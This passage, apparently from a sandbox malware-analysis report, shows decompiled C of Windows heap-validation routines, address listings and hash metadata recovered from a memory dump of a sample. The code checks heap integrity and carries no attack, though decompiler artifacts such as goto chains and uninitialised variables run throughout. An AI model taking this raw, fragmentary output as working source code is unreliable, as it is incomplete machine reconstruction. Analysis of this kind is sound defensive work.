									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E010FB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E011AFA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E010FB150();
										} else {
											E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E0114D540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E011BA80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E0111E12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E011BA80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E0111E4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E0111A229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E0111A309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E0111BC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E011A23E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E010F1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                          0x011b4af7
                                          0x011b4afb
                                          0x011b4afd
                                          0x011b4b01
                                          0x011b4b03
                                          0x011b4b08
                                          0x011b4b0a
                                          0x011b4b0f
                                          0x011b4eb5
                                          0x011b4eb5
                                          0x011b4ebb
                                          0x011b50d5
                                          0x011b50d8
                                          0x011b4ff6
                                          0x00000000
                                          0x011b4ff6
                                          0x011b50de
                                          0x011b50e4
                                          0x011b50e8
                                          0x011b5107
                                          0x011b510c
                                          0x011b50ea
                                          0x011b50ff
                                          0x011b5104
                                          0x011b5112
                                          0x011b5115
                                          0x011b5118
                                          0x011b5119
                                          0x011b50cb
                                          0x011b50cb
                                          0x011b50af
                                          0x00000000
                                          0x011b50af
                                          0x011b4ecb
                                          0x011b50b6
                                          0x011b50bb
                                          0x011b4ed1
                                          0x011b4ee6
                                          0x011b4eeb
                                          0x011b50c1
                                          0x011b50c2
                                          0x011b50c5
                                          0x011b50c6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b4b15
                                          0x011b4b15
                                          0x011b4b1c
                                          0x011b4b1e
                                          0x011b4b23
                                          0x011b4b27
                                          0x011b4b33
                                          0x011b4b38
                                          0x011b4b3a
                                          0x011b4b3c
                                          0x011b4b41
                                          0x011b4b41
                                          0x011b4b3a
                                          0x011b4b52
                                          0x011b5045
                                          0x011b504b
                                          0x011b504f
                                          0x011b506e
                                          0x011b5073
                                          0x011b5051
                                          0x011b5066
                                          0x011b506b
                                          0x011b5083
                                          0x011b5088
                                          0x011b5088
                                          0x011b508a
                                          0x011b5091
                                          0x011b5099
                                          0x011b5099
                                          0x011b509d
                                          0x011b50a7
                                          0x011b50ad
                                          0x011b50ad
                                          0x011b50ad
                                          0x00000000
                                          0x011b509d
                                          0x011b4b58
                                          0x011b4b5b
                                          0x011b4b5e
                                          0x011b4b63
                                          0x011b4b66
                                          0x011b4b69
                                          0x011b4b6f
                                          0x011b4be4
                                          0x011b4bf0
                                          0x011b4bf2
                                          0x011b4bf5
                                          0x011b4dc3
                                          0x011b4dc6
                                          0x011b4dc9
                                          0x011b4dce
                                          0x011b4dce
                                          0x011b4dd0
                                          0x011b4dd0
                                          0x011b4dd5
                                          0x011b4def
                                          0x011b4dd7
                                          0x011b4de7
                                          0x011b4de7
                                          0x011b4df3
                                          0x011b5001
                                          0x011b5007
                                          0x011b500b
                                          0x011b502a
                                          0x011b502f
                                          0x011b500d
                                          0x011b5022
                                          0x011b5027
                                          0x011b5039
                                          0x011b503a
                                          0x011b503b
                                          0x00000000
                                          0x011b4df9
                                          0x011b4dfd
                                          0x011b4e90
                                          0x011b4e94
                                          0x011b4e9e
                                          0x011b4ea4
                                          0x011b4ea4
                                          0x011b4ea4
                                          0x011b4ea6
                                          0x011b4ea6
                                          0x00000000
                                          0x011b4ea6
                                          0x011b4e03
                                          0x011b4e08
                                          0x011b4f88
                                          0x011b4f92
                                          0x011b4f99
                                          0x011b4f9c
                                          0x011b4fe0
                                          0x011b4fe4
                                          0x011b4fee
                                          0x011b4ff4
                                          0x011b4ff4
                                          0x011b4ff4
                                          0x00000000
                                          0x011b4fe4
                                          0x011b4f9e
                                          0x011b4fa4
                                          0x011b4fa8
                                          0x011b4fc7
                                          0x011b4fcc
                                          0x011b4faa
                                          0x011b4fbf
                                          0x011b4fc4
                                          0x011b4fd2
                                          0x011b4fd5
                                          0x011b4fd6
                                          0x011b4f34
                                          0x011b4f34
                                          0x00000000
                                          0x011b4f39
                                          0x011b4e0e
                                          0x011b4e14
                                          0x011b4e1b
                                          0x011b4e25
                                          0x011b4e2b
                                          0x011b4e2b
                                          0x011b4e33
                                          0x011b4e38
                                          0x011b4e8a
                                          0x011b4e8a
                                          0x00000000
                                          0x011b4e3a
                                          0x011b4e3e
                                          0x011b4e43
                                          0x011b4e47
                                          0x011b4e53
                                          0x011b4e58
                                          0x011b4e5a
                                          0x011b4e5c
                                          0x011b4e61
                                          0x011b4e61
                                          0x011b4e5a
                                          0x011b4e6e
                                          0x011b4f41
                                          0x011b4f47
                                          0x011b4f4b
                                          0x011b4f6a
                                          0x011b4f6f
                                          0x011b4f4d
                                          0x011b4f62
                                          0x011b4f67
                                          0x011b4f7f
                                          0x011b4f80
                                          0x011b4f81
                                          0x00000000
                                          0x011b4e74
                                          0x011b4e78
                                          0x011b4e82
                                          0x011b4e88
                                          0x011b4e88
                                          0x00000000
                                          0x011b4e78
                                          0x011b4e6e
                                          0x011b4e38
                                          0x011b4df3
                                          0x011b4bfe
                                          0x011b4c01
                                          0x011b4c04
                                          0x011b4c07
                                          0x011b4c09
                                          0x011b4c0c
                                          0x011b4c0e
                                          0x011b4c0e
                                          0x011b4c11
                                          0x011b4c11
                                          0x011b4c0c
                                          0x011b4c14
                                          0x011b4c17
                                          0x011b4dae
                                          0x011b4db2
                                          0x011b4db7
                                          0x011b4dba
                                          0x011b4dbd
                                          0x011b4ef1
                                          0x011b4ef7
                                          0x011b4efb
                                          0x011b4f1a
                                          0x011b4f1f
                                          0x011b4efd
                                          0x011b4f12
                                          0x011b4f17
                                          0x011b4f2b
                                          0x011b4f2b
                                          0x011b4f2d
                                          0x011b4f2e
                                          0x011b4f2f
                                          0x00000000
                                          0x011b4f2f
                                          0x00000000
                                          0x011b4c1d
                                          0x011b4c1d
                                          0x011b4c20
                                          0x011b4c23
                                          0x011b4c26
                                          0x011b4c29
                                          0x011b4c2c
                                          0x011b4c2e
                                          0x011b4d91
                                          0x011b4d91
                                          0x011b4d92
                                          0x011b4d97
                                          0x011b4d9e
                                          0x00000000
                                          0x011b4d9e
                                          0x011b4c34
                                          0x011b4c37
                                          0x011b4c39
                                          0x011b4c3c
                                          0x00000000
                                          0x00000000
                                          0x011b4c45
                                          0x011b4c48
                                          0x011b4c4e
                                          0x011b4c50
                                          0x011b4c78
                                          0x011b4c78
                                          0x011b4c7b
                                          0x011b4c7d
                                          0x011b4c80
                                          0x011b4c84
                                          0x011b4cad
                                          0x011b4cad
                                          0x011b4cb0
                                          0x011b4cb8
                                          0x011b4cbb
                                          0x011b4cbe
                                          0x011b4cc1
                                          0x011b4cc7
                                          0x011b4cdc
                                          0x011b4cc9
                                          0x011b4cd2
                                          0x011b4cd4
                                          0x011b4cd4
                                          0x011b4cde
                                          0x011b4ce0
                                          0x011b4d13
                                          0x011b4d13
                                          0x011b4d16
                                          0x011b4d18
                                          0x011b4d29
                                          0x011b4d2a
                                          0x011b4d2c
                                          0x011b4d34
                                          0x011b4d1a
                                          0x011b4d1a
                                          0x011b4d1a
                                          0x011b4d1d
                                          0x011b4d1f
                                          0x011b4d22
                                          0x011b4d24
                                          0x011b4d24
                                          0x011b4d3c
                                          0x011b4d3f
                                          0x011b4d45
                                          0x011b4d47
                                          0x011b4d6c
                                          0x011b4d6c
                                          0x011b4d70
                                          0x011b4d7e
                                          0x011b4d84
                                          0x011b4d84
                                          0x00000000
                                          0x011b4d49
                                          0x011b4d49
                                          0x011b4d56
                                          0x011b4d56
                                          0x011b4d59
                                          0x00000000
                                          0x00000000
                                          0x011b4d4e
                                          0x011b4d50
                                          0x011b4d52
                                          0x011b4d8e
                                          0x011b4d5d
                                          0x011b4d5f
                                          0x011b4d67
                                          0x00000000
                                          0x011b4d67
                                          0x011b4d54
                                          0x011b4d54
                                          0x011b4d5b
                                          0x00000000
                                          0x011b4d5b
                                          0x011b4ce2
                                          0x011b4ce2
                                          0x011b4ce5
                                          0x011b4ce5
                                          0x011b4ce7
                                          0x011b4cfb
                                          0x011b4ce9
                                          0x011b4ce9
                                          0x011b4cec
                                          0x011b4cef
                                          0x011b4cf1
                                          0x011b4cf3
                                          0x011b4cf3
                                          0x011b4cf3
                                          0x011b4cf6
                                          0x011b4cf6
                                          0x011b4d02
                                          0x011b4d05
                                          0x00000000
                                          0x00000000
                                          0x011b4d07
                                          0x011b4d0f
                                          0x011b4d11
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b4d11
                                          0x00000000
                                          0x011b4ce5
                                          0x011b4ce0
                                          0x011b4c8a
                                          0x011b4c8f
                                          0x011b4c91
                                          0x00000000
                                          0x00000000
                                          0x011b4c9d
                                          0x00000000
                                          0x011b4c9d
                                          0x011b4c52
                                          0x011b4c5f
                                          0x011b4c5f
                                          0x011b4c62
                                          0x00000000
                                          0x00000000
                                          0x011b4c57
                                          0x011b4c59
                                          0x011b4c5b
                                          0x011b4caa
                                          0x011b4c66
                                          0x011b4c68
                                          0x011b4c70
                                          0x011b4c75
                                          0x00000000
                                          0x011b4c75
                                          0x011b4c5d
                                          0x011b4c5d
                                          0x011b4c64
                                          0x00000000
                                          0x011b4c64
                                          0x011b4c17
                                          0x011b4b75
                                          0x011b4bc4
                                          0x011b4bc8
                                          0x00000000
                                          0x00000000
                                          0x011b4bd9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x011b4b77
                                          0x011b4b7a
                                          0x011b4b8c
                                          0x011b4b7c
                                          0x011b4b7e
                                          0x011b4b83
                                          0x011b4b86
                                          0x011b4b86
                                          0x011b4b90
                                          0x011b4b93
                                          0x00000000
                                          0x00000000
                                          0x011b4b95
                                          0x011b4bab
                                          0x011b4bb0
                                          0x00000000
                                          0x00000000
                                          0x011b4bb2
                                          0x011b4bb9
                                          0x00000000
                                          0x00000000
                                          0x011b4bbb
                                          0x011b4bbe
                                          0x011b4bc1
                                          0x011b4bc1
                                          0x00000000
                                          0x011b4bc1
                                          0x011b4b97
                                          0x011b4ba4
                                          0x00000000
                                          0x00000000
                                          0x011b4ba6
                                          0x00000000
                                          0x011b4ba6
                                          0x011b4ea9
                                          0x011b4ea9
                                          0x011b4eb2
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000002.00000002.438948857.00000000010D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010D0000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_2_2_10d0000_Product24573.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: 1f8eb29f2f6761651a316c4b7535333d613f274747d899272079ef7e097fc4aa
                                          • Instruction ID: 2cdb07ce7b73e7d9370a48a992e567c50b18931367da8c8c337a2971cd038aa0
                                          • Opcode Fuzzy Hash: 1f8eb29f2f6761651a316c4b7535333d613f274747d899272079ef7e097fc4aa
                                          • Instruction Fuzzy Hash: 1B12AA302006529FDB2DCF69C495BFABBE2FF58604F19C45DE5868BA42D734A880CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011B4496 Relevance: 10.4, Strings: 8, Instructions: 417COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 56%
                                          			E011B4496(signed int* __ecx, void* __edx) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed char _v24;
				signed int* _v28;
				char _v32;
				signed int* _v36;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t150;
				intOrPtr _t151;
				signed char _t156;
				intOrPtr _t157;
				unsigned int _t169;
				intOrPtr _t170;
				signed int* _t183;
				signed char _t184;
				intOrPtr _t191;
				signed int _t201;
				intOrPtr _t203;
				intOrPtr _t212;
				intOrPtr _t220;
				signed int _t230;
				signed int _t241;
				signed int _t244;
				void* _t259;
				signed int _t260;
				signed int* _t261;
				intOrPtr* _t262;
				signed int _t263;
				signed int* _t264;
				signed int _t267;
				signed int* _t268;
				void* _t270;
				void* _t281;
				signed short _t285;
				signed short _t289;
				signed int _t291;
				signed int _t298;
				signed char _t303;
				signed char _t308;
				signed int _t314;
				intOrPtr _t317;
				unsigned int _t319;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				intOrPtr _t328;
				signed int _t329;
				signed int _t330;
				signed int* _t331;
				signed int _t332;
				signed int _t350;

				_t259 = __edx;
				_t331 = __ecx;
				_v28 = __ecx;
				_v20 = 0;
				_v12 = 0;
				_t150 = E011B49A4(__ecx);
				_t267 = 1;
				if(_t150 == 0) {
					L61:
					_t151 =  *[fs:0x30];
					__eflags =  *((char*)(_t151 + 2));
					if( *((char*)(_t151 + 2)) != 0) {
						 *0x11e6378 = _t267;
						asm("int3");
						 *0x11e6378 = 0;
					}
					__eflags = _v12;
					if(_v12 != 0) {
						_t105 =  &_v16;
						 *_t105 = _v16 & 0x00000000;
						__eflags =  *_t105;
						E0112174B( &_v12,  &_v16, 0x8000);
					}
					L65:
					__eflags = 0;
					return 0;
				}
				if(_t259 != 0 || (__ecx[0x10] & 0x20000000) != 0) {
					_t268 =  &(_t331[0x30]);
					_v32 = 0;
					_t260 =  *_t268;
					_t308 = 0;
					_v24 = 0;
					while(_t268 != _t260) {
						_t260 =  *_t260;
						_v16 =  *_t325 & 0x0000ffff;
						_t156 = _t325[0];
						_v28 = _t325;
						_v5 = _t156;
						__eflags = _t156 & 0x00000001;
						if((_t156 & 0x00000001) != 0) {
							_t157 =  *[fs:0x30];
							__eflags =  *(_t157 + 0xc);
							if( *(_t157 + 0xc) == 0) {
								_push("HEAP: ");
								E010FB150();
							} else {
								E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t325);
							E010FB150("dedicated (%04Ix) free list element %p is marked busy\n", _v16);
							L32:
							_t270 = 0;
							__eflags = _t331[0x13];
							if(_t331[0x13] != 0) {
								_t325[0] = _t325[0] ^ _t325[0] ^  *_t325;
								 *_t325 =  *_t325 ^ _t331[0x14];
							}
							L60:
							_t267 = _t270 + 1;
							__eflags = _t267;
							goto L61;
						}
						_t169 =  *_t325 & 0x0000ffff;
						__eflags = _t169 - _t308;
						if(_t169 < _t308) {
							_t170 =  *[fs:0x30];
							__eflags =  *(_t170 + 0xc);
							if( *(_t170 + 0xc) == 0) {
								_push("HEAP: ");
								E010FB150();
							} else {
								E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							E010FB150("Non-Dedicated free list element %p is out of order\n", _t325);
							goto L32;
						} else {
							__eflags = _t331[0x13];
							_t308 = _t169;
							_v24 = _t308;
							if(_t331[0x13] != 0) {
								_t325[0] = _t169 >> 0x00000008 ^ _v5 ^ _t308;
								 *_t325 =  *_t325 ^ _t331[0x14];
								__eflags =  *_t325;
							}
							_t26 =  &_v32;
							 *_t26 = _v32 + 1;
							__eflags =  *_t26;
							continue;
						}
					}
					_v16 = 0x208 + (_t331[0x21] & 0x0000ffff) * 4;
					if( *0x11e6350 != 0 && _t331[0x2f] != 0) {
						_push(4);
						_push(0x1000);
						_push( &_v16);
						_push(0);
						_push( &_v12);
						_push(0xffffffff);
						if(E01139660() >= 0) {
							_v20 = _v12 + 0x204;
						}
					}
					_t183 =  &(_t331[0x27]);
					_t281 = 0x81;
					_t326 =  *_t183;
					if(_t183 == _t326) {
						L49:
						_t261 =  &(_t331[0x29]);
						_t184 = 0;
						_t327 =  *_t261;
						_t282 = 0;
						_v24 = 0;
						_v36 = 0;
						__eflags = _t327 - _t261;
						if(_t327 == _t261) {
							L53:
							_t328 = _v32;
							_v28 = _t331;
							__eflags = _t328 - _t184;
							if(_t328 == _t184) {
								__eflags = _t331[0x1d] - _t282;
								if(_t331[0x1d] == _t282) {
									__eflags = _v12;
									if(_v12 == 0) {
										L82:
										_t267 = 1;
										__eflags = 1;
										goto L83;
									}
									_t329 = _t331[0x2f];
									__eflags = _t329;
									if(_t329 == 0) {
										L77:
										_t330 = _t331[0x22];
										__eflags = _t330;
										if(_t330 == 0) {
											L81:
											_t129 =  &_v16;
											 *_t129 = _v16 & 0x00000000;
											__eflags =  *_t129;
											E0112174B( &_v12,  &_v16, 0x8000);
											goto L82;
										}
										_t314 = _t331[0x21] & 0x0000ffff;
										_t285 = 1;
										__eflags = 1 - _t314;
										if(1 >= _t314) {
											goto L81;
										} else {
											goto L79;
										}
										while(1) {
											L79:
											_t330 = _t330 + 0x40;
											_t332 = _t285 & 0x0000ffff;
											_t262 = _v20 + _t332 * 4;
											__eflags =  *_t262 -  *((intOrPtr*)(_t330 + 8));
											if( *_t262 !=  *((intOrPtr*)(_t330 + 8))) {
												break;
											}
											_t285 = _t285 + 1;
											__eflags = _t285 - _t314;
											if(_t285 < _t314) {
												continue;
											}
											goto L81;
										}
										_t191 =  *[fs:0x30];
										__eflags =  *(_t191 + 0xc);
										if( *(_t191 + 0xc) == 0) {
											_push("HEAP: ");
											E010FB150();
										} else {
											E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_t262);
										_push( *((intOrPtr*)(_v20 + _t332 * 4)));
										_t148 = _t330 + 0x10; // 0x10
										_push( *((intOrPtr*)(_t330 + 8)));
										E010FB150("Tag %04x (%ws) size incorrect (%Ix != %Ix) %p\n", _t332);
										L59:
										_t270 = 0;
										__eflags = 0;
										goto L60;
									}
									_t289 = 1;
									__eflags = 1;
									while(1) {
										_t201 = _v12;
										_t329 = _t329 + 0xc;
										_t263 = _t289 & 0x0000ffff;
										__eflags =  *((intOrPtr*)(_t201 + _t263 * 4)) -  *((intOrPtr*)(_t329 + 8));
										if( *((intOrPtr*)(_t201 + _t263 * 4)) !=  *((intOrPtr*)(_t329 + 8))) {
											break;
										}
										_t289 = _t289 + 1;
										__eflags = _t289 - 0x81;
										if(_t289 < 0x81) {
											continue;
										}
										goto L77;
									}
									_t203 =  *[fs:0x30];
									__eflags =  *(_t203 + 0xc);
									if( *(_t203 + 0xc) == 0) {
										_push("HEAP: ");
										E010FB150();
									} else {
										E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_t291 = _v12;
									_push(_t291 + _t263 * 4);
									_push( *((intOrPtr*)(_t291 + _t263 * 4)));
									_push( *((intOrPtr*)(_t329 + 8)));
									E010FB150("Pseudo Tag %04x size incorrect (%Ix != %Ix) %p\n", _t263);
									goto L59;
								}
								_t212 =  *[fs:0x30];
								__eflags =  *(_t212 + 0xc);
								if( *(_t212 + 0xc) == 0) {
									_push("HEAP: ");
									E010FB150();
								} else {
									E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_t331[0x1d]);
								_push(_v36);
								_push("Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)\n");
								L58:
								E010FB150();
								goto L59;
							}
							_t220 =  *[fs:0x30];
							__eflags =  *(_t220 + 0xc);
							if( *(_t220 + 0xc) == 0) {
								_push("HEAP: ");
								E010FB150();
							} else {
								E010FB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_t328);
							_push(_v24);
							_push("Number of free blocks in arena (%ld) does not match number in the free lists (%ld)\n");
							goto L58;
						} else {
							goto L50;
						}
						while(1) {
							L50:
							_t92 = _t327 - 0x10; // -24
							_t282 = _t331;
							_t230 = E011B4AEF(_t331, _t92, _t331,  &_v24,  &_v36,  &_v28, _v20, _v12);
							__eflags = _t230;
							if(_t230 == 0) {
								goto L59;
							}
							_t327 =  *_t327;
							__eflags = _t327 - _t261;
							if(_t327 != _t261) {
								continue;
							}
							_t184 = _v24;
							_t282 = _v36;
							goto L53;
						}
						goto L59;
					} else {
						while(1) {
							_t39 = _t326 + 0x18; // 0x10
							_t264 = _t39;
							if(_t331[0x13] != 0) {
								_t319 = _t331[0x14] ^  *_t264;
								 *_t264 = _t319;
								_t303 = _t319 >> 0x00000010 ^ _t319 >> 0x00000008 ^ _t319;
								_t348 = _t319 >> 0x18 - _t303;
								if(_t319 >> 0x18 != _t303) {
									_push(_t303);
									E011AFA2B(_t264, _t331, _t264, _t326, _t331, _t348);
								}
								_t281 = 0x81;
							}
							_t317 = _v20;
							if(_t317 != 0) {
								_t241 =  *(_t326 + 0xa) & 0x0000ffff;
								_t350 = _t241;
								if(_t350 != 0) {
									if(_t350 >= 0) {
										__eflags = _t241 & 0x00000800;
										if(__eflags == 0) {
											__eflags = _t241 - _t331[0x21];
											if(__eflags < 0) {
												_t298 = _t241;
												_t65 = _t317 + _t298 * 4;
												 *_t65 =  *(_t317 + _t298 * 4) + ( *(_t326 + 0x10) >> 3);
												__eflags =  *_t65;
											}
										}
									} else {
										_t244 = _t241 & 0x00007fff;
										if(_t244 < _t281) {
											 *((intOrPtr*)(_v12 + _t244 * 4)) =  *((intOrPtr*)(_v12 + _t244 * 4)) + ( *(_t326 + 0x10) >> 3);
										}
									}
								}
							}
							if(( *(_t326 + 0x1a) & 0x00000004) != 0 && E011A23E3(_t331, _t264) == 0) {
								break;
							}
							if(_t331[0x13] != 0) {
